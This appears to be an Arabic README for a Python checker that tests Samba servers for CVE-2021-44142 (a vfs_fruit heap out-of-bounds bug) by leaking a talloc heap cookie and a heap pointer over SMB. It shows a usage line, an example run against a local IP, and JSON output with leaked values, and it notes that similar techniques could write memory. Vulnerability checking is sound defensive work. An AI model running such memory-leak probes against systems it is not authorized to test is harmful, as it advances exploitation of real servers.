
أداة بايثون لفحص خوادم Samba بحثًا عن CVE-2021-44142 عن طريق تسريب ملفات تعريف الارتباط (heap cookies) والمؤشرات عبر اتصال SMB واحد، مما يُظهر قابلية الاستغلال.
أداة للتحقق مما إذا كان خادم Samba معرضًا للثغرة CVE-2021-44142
CVE-2021-44142 هي ثغرة قراءة وكتابة خارج حدود الكومة (heap out-of-bounds) في وحدة vfs_fruit الخاصة بـ Samba، وقد استُخدمت في مسابقة Pwn2Own Austin 2021 ضد جهاز Western Digital PR4100. تم اكتشافها لأول مرة بواسطة Nguyễn Hoàng Thạch وBilly Jheng Bing-Jhong من STAR Labs. كما أبلغ Orange Tsai من DEVCORE عن هذه الثغرة. يعتمد هذا العمل على مقالة مدونة كتبها 0xsha على الرابط https://0xsha.io/blog/a-samba-horror-story-cve-2021-44142.
توضح هذه الأداة قابلية التعرض للثغرة CVE-2021-44142 عن طريق تفريغ كعكة كومة talloc ومؤشر القائمة المرتبطة. يمكن استخدام تقنيات مشابهة لكتابة هذه البيانات.
يوسع هذا العمل عمل 0xsha من خلال:
python check_vulnerable.py
usage: check_vulnerable.py [-h] [--password PASSWORD] server port share user
check_vulnerable.py: error: the following arguments are required: server, port, share, user
python check_vulnerable.py 192.168.1.183 445 TimeMachineBackup Guest
{
"vulnerable": true,
"heap_cookie_leak": "0xfc571370",
"heap_pointer_leak": "0x55e4e717b1b0",
"fail_reason": ""
}